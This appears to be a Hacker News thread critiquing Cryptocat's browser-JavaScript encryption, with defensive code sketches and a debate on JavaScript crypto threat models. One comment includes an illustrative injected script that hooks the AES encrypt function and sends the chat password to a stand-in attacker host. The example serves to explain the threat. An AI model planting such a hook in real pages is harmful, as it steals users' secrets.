Cryptocat: webchat with client-side encryption features (crypto.cat)
24 points by magikarp 2239 days ago | 44 comments



Took me a little while to realise you set the password in the blue box above the text entry. Interesting concept though.

For those interested it uses crypto-js (http://code.google.com/p/crypto-js/).

Might want to improve the random entropy source; from what I can see it's just the current date/time.

Also I'd use a better hashing algorithm than SHA1 with AES-256.

I understand the need for PBKDF2, but I'm not so sure about using the password as both the key and the salt.
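For illustration, here's roughly what deriving the key from a random salt could look like. This is just a sketch against the current CryptoJS 3.x API (not the 2.3.0 build Cryptocat links), and roomPassword is a made-up variable name:

    // A sketch, not Cryptocat's code: derive the AES key with PBKDF2 from the shared
    // password plus a random salt, instead of reusing the password as both key and salt.
    // Assumes the CryptoJS 3.x API; roomPassword is a made-up variable.
    var salt = CryptoJS.lib.WordArray.random(16);          // 128-bit random salt
    var key  = CryptoJS.PBKDF2(roomPassword, salt, {
      keySize: 256 / 32,                                   // 256-bit key for AES-256
      iterations: 10000                                    // make brute force slower
    });
    // The salt isn't secret and can travel alongside the ciphertext.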


They aren't using SHA1; they're using HMAC-SHA1. Not the same thing.

That said: this is an idiosyncratic (rekeying AES every 500ms?) and not particularly resilient cryptosystem. As a commenter said below: don't use this for anything serious. You're equally well off with a server that simply sends "plaintext" messages over TLS.


AFAIK, the server does not rekey AES every 500ms - and your suggestion to use a server over TLS opens you up to the problem of the server itself being able to read all plaintext.


The server can read all the plaintext anyways.


No it can't, that's the whole point! Are you trolling?


No, what's happening here is that you don't actually understand the threat model for encryption code running in Javascript fed by a server, and you're getting more and more frustrated by the fact that I'm not handholding you through it.

Reasoning about security systems (click my name to see that I do that for a living) is frustrating. To see what's happening in this case, steel yourself for a headache, sit down, and think hard through all the different things that attackers can potentially influence. Then ask yourself, "what could an attacker accomplish by manipulating that thing?".


Right...


Made a test room, 'hn' (https://crypto.cat/?c=hn). Set a key, 'password'. Will leave it open in the background and peek in occasionally if others want to try.


I was thinking of building something similar. The benefit of client-side encryption is that the message stays entirely encrypted until it reaches the destination. Even if the cryptocat server were compromised, the message would still be "safe".


No, if the server is compromised, you are thoroughly boned. In fact, there are very common vulnerabilities that don't come close to compromising the server that still destroy the security of this scheme.

Javascript cryptography is almost always a terrible idea.


"If the server is compromised [insert disastrous result here]" applies more so to many other servers serving you crypto - I feel there's the advantage of being able to verify the .js files yourself in your browser here:

    <!-- cryptocat uses the crypto-js library - http://code.google.com/p/crypto-js/ -->
    <!-- http://crypto-js.googlecode.com/files/2.3.0-crypto-sha1-hmac... -->
    <script type="text/javascript" src="js/crypto.js"></script>


You can't just verify the .js file! You have to verify every line of JS code that ever hits the JS interpreter, whether it's specified directly in the source code that the author told you about or eval'd later in some random event handler. That code could come from an explicit <script> tag in the original DOM source; it could come from an event handler specified in the DOM, or set later by any other piece of JS; it could come from an Ajax request handler; in many browsers, it can even come from CSS. It can easily hide itself after it does its job, and it isn't going to look like "<!-- zero out AES key here -->".
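To make that concrete, here's a hypothetical payload of the sort that could arrive through any of those channels. It assumes a crypto-js 2.x style Crypto.AES global, and it never appears in the .js file you verified:

    // Hypothetical injected payload; nothing like this shows up in the .js file you checked.
    (function () {
      var realEncrypt = Crypto.AES.encrypt;               // assumes a crypto-js 2.x global
      Crypto.AES.encrypt = function (message, password, options) {
        // leak the shared password to a third party, then encrypt as usual
        new Image().src = "https://attacker.example/?k=" + encodeURIComponent(password);
        return realEncrypt.apply(Crypto.AES, arguments);
      };
    })();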

The browser JS runtime does not provide the tools you need to verify the integrity of a cryptosystem. Full stop.

Actually, browser JS runtimes don't even provide the tools you need to safely run a cryptosystem. How do you know what intermediate values are cached by any given JS? How do you know if any given crypto function is leaving footprints in browser memory? You don't; nobody does; nobody has published the exhaustive analysis of any browser JS to support an argument either way.

Not that that matters for crypto.cat; they don't seem to care much about side channel stuff; for instance, their HMAC compare is the JS string "!=" operator.
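For reference, a constant-time compare is only a few lines of JS; this is a generic sketch, not anything from crypto.cat's code:

    // Generic constant-time comparison sketch (assumes equal-length MAC strings, e.g. hex).
    function constantTimeEqual(a, b) {
      if (a.length !== b.length) return false;
      var diff = 0;
      for (var i = 0; i < a.length; i++) {
        diff |= a.charCodeAt(i) ^ b.charCodeAt(i);        // no early exit on mismatch
      }
      return diff === 0;
    }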

As for "applies to so many other servers": I don't know what you're saying. You made a claim about the security properties of this application. That claim was wrong. It doesn't become right when you point out some other app that has the same flaw.


What about loading a Java applet (and communicating with it from JS) that handles all the encrypting/decrypting? Would that take care of at least the latter concern?


Yes; you could just use Bouncycastle's Java PGP implementation, which is probably the safest option.

But people hate Java, and it's increasingly disabled in browsers.


Well I thought the question was interesting because if that'd work, so would a native Web API.


A native web API would work! I think it'd be great if everyone could agree on some basic, high-level crypto functions, implemented in browser C, to expose to JS. You'd want the interface to look much more like Keyczar than crypto-js, though.
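Something along these lines, as a sketch of the shape I mean (this follows the SubtleCrypto interface: opaque key handles, named high-level algorithms, with the actual work done in native code behind a promise API):

    // Sketch of a high-level, browser-native call in the SubtleCrypto style (AES-GCM).
    // Keys are opaque handles created in native code; JS never touches the raw key bytes.
    var iv = crypto.getRandomValues(new Uint8Array(12));   // 96-bit nonce
    crypto.subtle.generateKey({ name: "AES-GCM", length: 256 }, false, ["encrypt", "decrypt"])
      .then(function (key) {
        return crypto.subtle.encrypt({ name: "AES-GCM", iv: iv }, key,
                                     new TextEncoder().encode("hello"));
      })
      .then(function (ciphertext) {
        // ciphertext is an ArrayBuffer produced entirely by native code
      });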


I was also wondering (I hope you don't mind): would it be considered safe to just verify signed messages using crypto-js? For example, let's say the environment (webapp) is bootstrapped over TLS, and this includes the public key. Could this application then receive signed messages through a different, insecure channel and verify them safely using the public key received through the secure channel?


If it can be safe to verify the integrity of a JS cryptosystem at all, I think it's going to turn out to be tricky to do it. Like I said elsewhere on this thread, the number of ways a web page can influence the Javascript runtime is huge, and a lot of those ways are cached.


Well the integrity of the JS cryptosystem would be no worse than the integrity of the webapp itself.

I understand that one cannot trust the JS crypto for handling the private key and doing any signing & encryption, because of the possibility of leaking information through side channels. That's why I was wondering if it'd be possible to use JS crypto in only one direction: to verify messages against a public key received through the secure channel.

If the JS crypto only does verification, it wouldn't matter if the _public_ key is cached, as long as it can't be arbitrarily changed by another process. If the server is taken over, or there's an XSS or other client-side vulnerability, the bidirectional TLS would be similarly useless anyway.


It's not the "math" of the crypto that concerns me; it's the actual integrity of the code performing it. So for instance, if you're trying to do RSA operations in JS, how do you know that none of the bindings in the current Javascript runtime have been exposed to attacker-controllable content? How do you know nothing in the runtime was fed by cached content read over straight HTTP? Or from an HTTPS server that has a DOM corruption flaw?


If any of those things can be used to affect the crypto part, then they could also be used to affect the web application itself in the first place. I'm only looking for the level of integrity that I can get from launching the web application over HTTPS anyway.


Is this a point that we're dancing around here? Let's resolve it: for the most part†, you're right: the things that break clientside JS web crypto are things that break (in various degrees) the web app itself. The problem with accepting this is that the point of clientside crypto is to inoculate users from the downside risks of the simple security flaws that most applications have. What's the point of sophisticated clientside crypto if it's undone by any trivial XSS flaw?

† There are issues that damage clientside JS crypto that don't blow up the app itself, but they are not the core issues I'm concerning myself with here.


I am mostly interested in replacing bi-directional TLS. There are things that need to be encrypted (authentication, any authorized operations, fetching authorized content), but the majority of content the application uses is public, so encrypting it is largely redundant.

Unfortunately I can't just bootstrap the application over a secure channel and fetch the rest of the content over insecure channels, as it'd be trivial to poison the application through the unencrypted communication. Take a Hacker News-like application: let's say that news and comments can be accessed over an insecure channel while voting and authentication are performed over TLS. Even though the authorized operations are safe, the data could be poisoned over the insecure channel; for example, the user-id could be manipulated and the user would end up securely voting for someone else's post. To mitigate this, all data would have to be fetched over the secure channel. But currently that's all or nothing: by fetching public data over TLS, one has to pay the encryption tax, both in CPU time and in losing any caching middleware.

Of course, signing HTTP messages wouldn't just be TLS-light, since the messages could be stored and kept as evidence that the webserver produced them, which is different from TLS's session-based guarantees, but it should be fine for what I need. This is why I was interested to know whether such an approach would degrade the security of the web application below what bi-directional TLS could offer.
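To sketch what I have in mind (purely hypothetical, using the browser's SubtleCrypto verify() call; the function and variable names are made up):

    // Hypothetical sketch: verify a signed, publicly served response against a public
    // key that arrived with the TLS-bootstrapped application.
    function verifyResponse(publicKey, signature, body) {
      // publicKey: a CryptoKey imported from the HTTPS-served bootstrap
      // signature: ArrayBuffer taken from a response header
      // body:      ArrayBuffer of the response body fetched over plain HTTP
      return crypto.subtle.verify({ name: "RSASSA-PKCS1-v1_5" }, publicKey, signature, body)
        .then(function (ok) {
          if (!ok) throw new Error("bad signature; discard the response");
          return body;
        });
    }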

I suppose this is not the most exciting use for client-side cryptography right now…

I think web applications are increasingly going in the direction of reinventing Java applets anyway. There are a few components needed for that, and they will be introduced gradually:

1) Applications that can be installed and launched locally (e.g. a more sophisticated version of the Chrome Web Store). Once you have that, you basically have RPM in the browser.

2) A capabilities system that controls what and how an application can access. All the pieces are already there: web extensions, mobile apps, etc.

3) Pluggable storage to eliminate the need for storing data on a remote server. There are LocalStorage and IndexedDB already; now it's just a matter of time until Chrome adds Google Storage, Apple adds iCloud, Ubuntu adds Ubuntu One, etc.

Once you have that, Java[Script] applets are basically back. With NaCl in the mix you could even actually run the JVM in the browser once again. So yeah, I think in the long run client-side cryptography will come around. But for now I just wanted to make use of what's currently available.


This is generally a terrible idea. TLS 1.2 is the product of almost 20 years of sustained attention and adversarial testing effort, 20 years of missteps, 20 years of design decisions argued over by people including (but by no means limited to) some of the best cryptosystem thinkers in the field, and it still has missteps in it.

The idea of replacing it with ad-hoc encryption at the application layer carries with it the notion that the basic problem of "taking some bundle of application data and securing it so that it is encrypted in flight" is somehow simple, and that TLS 1.2 is overkill for it. But that's not true. To a significant extent, everything TLS 1.2 does that you don't do is a vulnerability in your system. You won't see it or fully understand it; extremely competent people have gone years staring terrible vulnerabilities in TLS in the face, even after those flaws were pointed out to them, and let them pass because the real-world practical impact wasn't obvious at the time.

And this is all before you get to the point where, to avoid the overhead and complexity and inflexibility (and whatnot) of TLS 1.2, you choose to build your cryptosystem in the most hostile possible environment for cryptography: the language runtime where no operation, function, or binding can be trusted, where every symbol table is potentially corrupted by any of 10s of content sources, many of them under the control of attackers, in a runtime that is being aggressively redesigned, optimized, JIT'd, cached, and transformed for performance.

So you can see that this goal puts you out in the wilderness on two vectors: one of attempting to start from scratch on secure transport protocols, when 20 years has shown us that the simplest service models for secure transport are surprisingly hard; and the other vector being "trying to implement secure crypto in a language environment that's hostile to the concept".

Skip it. Work on something that will make people's lives better right now, instead.


> The idea of replacing it with ad-hoc encryption at the application layer

Yes, I understand that this would be a terrible idea. That is why I only intended to verify signed, public content using a static key. I don't intend to do any encryption in client-side JS, not even to generate session keys!


Verifying signatures under public keys is not an easier problem than encrypting data; it's actually a harder one: more things can go wrong, not less.


What do you mean? I thought that if you eliminate the things I've mentioned previously, all that is left is just a checksum algorithm and some math. Note that the public key would come over the secure TLS channel, so there's no issue of obtaining and verifying one.


We're too far to the right on this thread to keep going with this, but take my word for at least this: public key signature verification is advanced number theoretic cryptography. It is actually less straightforward than somehow applying a block cipher to variable-length arrays of user data.


So does it just mean that the implementation is hard to get right? I'm all for killing off ideas, especially when it comes to cryptography, but I'd like to at least learn something in the process. Is there somewhere I can learn about everything that can go wrong with that specific process, or would I have to try to implement these algorithms myself to understand the risks? BTW, thanks for everything so far; I trust you're a busy man.


A great place to start is (Google) [nigel cryptography]; for your particular question, start with the chapter "attacks on public key cryptography".


Wrong: if the cryptocat server were compromised, the source could be changed to send everything as plaintext or to send the encryption key to a third party.


Free sticker if you can tell the thread an even more plausible vulnerability, where the attacker can't directly change the source code in the .js files, that would be equally fatal to a scheme like this.


A third party can use a carefully crafted ettercap filter to force the user to download an alternate .js file.


They'd need to defeat https first.


Seems useful.


Why not just have users type in a room name and password on creation? No need to set the salt after the fact.


Except that the encryption is handled with javascript (obviously). I wouldn't use this for anything serious.


Why not? AES has been implemented in javascript half a dozen times.


And? What is that evidence of?


That the implementation of an encryption library in Javascript is not a reason to mistrust services which use that library?


It isn't evidence of that. Implementation in browser JS is in fact a reason to distrust a cryptosystem.


Okay..? What difference does that make?


Because... the server might send a broken .js, thereby forcing your chat client into sending plaintext.


Exactly, that's the point. Or a browser extension. Or various other fun things, see tptacek's conversation above.



